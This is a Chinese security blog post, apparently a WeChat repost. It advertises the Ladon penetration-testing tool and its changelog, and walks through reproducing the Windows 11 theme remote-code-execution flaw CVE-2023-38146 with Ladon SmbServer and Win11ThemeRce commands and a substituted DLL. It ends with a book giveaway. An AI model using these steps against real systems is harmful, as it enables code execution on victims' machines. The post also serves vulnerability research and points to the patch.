文章来源:K8实验室
简介:
Ladon单兵作战综合工具、模块化网络渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。12.4版本内置265个功能模块,外部模块18个,网络资产探测模块30个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个包含Cisco、Zimbra、Exchange、DrayTek、MS17010、SMBGhost、Weblogic、ActiveMQ、Tomcat、Struts2系列、Printer等,密码审计23个含数据库(Mysql、Oracle、MSSQL)、FTP、SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、BasicAuth、Tomcat、Weblogic、Rar等,远程执行命令包含(smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web指纹识别模块可识别135+(Web应用、中间件、脚本类型、页面类型)等,本地提权21+含SweetPotato\BadPotato\EfsPotato\BypassUAC,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动 内网渗透。
Ladon早期功能只是内网渗透扫描器,所以大家误以为Ladon只是内网渗透工具,随着版本更迭,这2年不管是外网渗透、内网渗透、Web渗透还是后渗透,如前渗透,使用相关搜索引擎导出探测好的IP或URL,即可直接用Ladon批量利用新出漏洞获取大量权限。后渗透拿到权限后,不管是操作系统提权、数据库提权,或是横向执行命令、域渗透模块等,各种功能应有尽有,一个工具解决大量问题,所以定义单兵综合作战工具。
Ladon 12.4
Ladon 12.4 20240108
[u]SmbServer 支持Smb v1 v2 v3协议
[u]HtaServer 支持自定义端口
[+]GenURL 生成url文件(Windows RCE CVE-2023-36025或其它漏洞)
[u]SslInfo 输出SslInfo.log日志
[+]SmbServer 修复写日志崩溃的Bug,日志文件为SmbServer.log
12.28
[u]SslInfo 输出SslInfo.txt日志,解决一些语言乱码问题
[u]cmddll 修复Win7/Win8下GUI生成DLL的问题
12.3 20231221
[+]SmbServer 一键SMB共享服务器,记录来访IP,访问资源等
[+]Win11ThemeRce CVE-2023-38146 Win11主题远程执行Exploit
12.15
[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置
Ladon 12.2 12.14
[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权
支持Windows/Linux/MacOS等服务器操作系统
支持高版本Oracle 12G、11G、12G及之前版本
[+]FindAD PVEFindADUser可用于查找活动目录用户登陆的位置、枚举域用户
Ladon 12.1 12.08
[+]LotusAdmin 检测用户是否Lotus管理员
[+]HtaSer Hta服务器(不限后缀,如访问doc执行hta)
[+]ConfVer ConfluenceVer探测Confluence版本
Ladon 12.0 20231201
[+]DomainLog DomainUserIP 远程查询 域用户、IP
[u]LoginLog 4624成功日志 域用户、域名、登陆IP
/all 导出全部日志 原始数据
LoginLog 用户名
LoginLog 用户名 记录数
==========================================================
Ladon 11.9 20231105
[u]LadonStudy 支持bypassEDR
[u]LadonShell 支持tls 1.2
[u]RdpInfo 优化RDP Ntlm探测系统信息
[u]RdpLog 查看3389连接日志(IP、用户名、CertHash)
[+]CVE-2023-46604 ActiveMQ CVE-2023-46604 RCE Exploit
Ladon 11.8 20231018
[u]InfoScan 新增SmtpInfo
[+]SmtpInfo 新增Smtp Ntlm探测系统信息(25、465、587端口)
[u]InfoScan 新增HttpInfo
[+]HttpInfo 新增Http/Https Ntlm探测系统信息(SharePoint)
CVE ID | CVE-2023-38146 | 发现时间 | 2023-09-13 |
类 型 | RCE | 等 级 | 高危 |
攻击向量 | 网络 | 所需权限 | 无 |
攻击复杂度 | 低 | 用户交互 | 需要 |
PoC/EXP | 已公开 | 在野利用 | 未知 |
Windows主题是一种视觉模式,它预先定义了墙纸、图标、指针、屏幕保护程序、声音或任何颜色样式的集合,这些样式一起构成了PC的界面,用户也可以根据自己的喜好更改主题和自定义主题。
9月15日,Windows主题远程代码执行漏洞(CVE-2023-38146,也称为ThemeBleed)的PoC在互联网上公开,该漏洞的CVSSv3评分为8.8,微软已在9月补丁日发布的更新中修复了该漏洞。
当 .MSSTYLES文件的PACKTHEM_VERSION为999时,处理 .MSSTYLES 文件的例程在 DLL("_vrf.dll")签名验证时间与加载库的时间之间存在重大差异,从而产生竞争条件。可使用特制的 .MSSTYLES文件,利用竞争窗口将经过验证的DLL替换为恶意DLL,从而导致在目标计算机上运行任意代码。但利用该漏洞需要诱导目标用户在易受攻击的系统上加载 Windows 主题文件。
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 11 version 21H2 for ARM64-based Systems
Windows 11 version 21H2 for x64-based Systems
漏洞复现
POC为互联网公开,已将其加入Ladon,原版不支持SMB
V1和V3版本,经过多次测试发现,有时windows会随机使用v1、v2连接SMB,第1天不管测多少次,均可加上SMB执行代码,第2天优化其它功能,发现同一一台机器,莫名奇妙,不管执行多少次,清理DNS缓存、SMB缓存等、重置网络等都没用,不知何故它一直用V1连接,自己的环境都出现这种情况,实战环境更复杂,什么情况都会出现。
一、开启SMB服务器(支持win11主题rce)
关闭系统SMB服务,不让445端口占用
Ladon SmbServer
资源管理器访问\\192.168.50.165\test,看到共享即为成功
二、生成poc主题文件
Ladon Win11ThemeRce 192.168.50.165
三、 程序同根目录下放share目录 stage_3可替换成自己的dll
代码执行
漏洞描述攻击者可利用该漏洞在未授权的情况下,构造恶意数据,诱引目标在易受攻击的系统上加载,执行远程代码执行攻击,最终获取系统代码执行权限。测试在Win11机器上,双击win11poc.theme,将会弹出计算器
微软已在9月补丁日中发布了该漏洞的安全更新,受影响用户可及时安装更新。
下载链接:
https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2023-38146
文末惊喜抽奖
一:数字银行安全体系构建
本书内容来源于网商银行在信息安全方面的一线实战经验,主要介绍网商银行作为一家数字化银行如何进行网络信息安全体系建设,覆盖的安全子领域包括:基础设施安全、业务应用安全、数据安全、威胁感知、红蓝演练等。
本书的内容总体分为六个部分:第一部分介绍数字银行安全体系建设的整体架构与方法论,第二部分介绍默认安全机制,讲述如何有效控制所有已知类型的安全风险,第三部分介绍可信纵深防御体系,讲述如何应对未知类型的安全风险和高级威胁,第四部分介绍威胁感知与响应体系,讲述对于可能发生的威胁如何有效感知和处置,第五部分介绍实战检验,通过实战攻防演习的方式讲述如何检验安全体系的有效性和安全水位,第六部分介绍安全数智化,讲述如何通过数字化、自动化、智能化实现安全工作的有效开展。
宠粉们福利,会有5 本书籍免费赠送。
规则如下:
1. 本文末点‘在看’给个支持的动力就可以,不需要转发朋友圈!!
2. 私聊下面公众号发送“抽奖”即可扫描参与抽奖,注意看是发送暗号“抽奖”。
3. 活动截止时间为1月11日 12:00点,到时候还要中奖者及时联系号主发送你的中奖核验二维码、收货地址、姓名、手机号以及想要的书籍,好给您发送书籍哦!24小时内未联系号主视为自动放弃!骗书行为出版社会永久拉黑!
往期回顾
关注我
获得更多精彩
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文